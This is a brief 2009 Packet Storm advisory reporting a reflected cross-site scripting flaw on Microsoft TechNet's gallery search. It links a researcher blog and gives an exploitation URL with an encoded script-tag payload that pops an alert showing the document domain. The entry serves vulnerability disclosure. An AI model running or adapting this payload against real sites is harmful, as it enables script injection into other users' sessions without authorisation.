Microsoft Technet Cross Site Scripting

2009-12-01T00:00:00
ID PACKETSTORM:83314
Type packetstorm
Reporter TEAMELITE
Modified 2009-12-01T00:00:00

Description

                                        
                                            `A cross site scripting vulnerability was discovered by t3am3lite on the Microsoft technet site.  
  
Full blog with screenshots:  
  
http://security-sh3ll.blogspot.com/2009/11/microsoft-technet-vulnerable-to-cross.html  
  
  
Exploitation:  
  
http://gallery.technet.microsoft.com/ScriptCenter/en-us/site/search?f[0].Type=%27Tag&f[0].Value=%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E  
  
`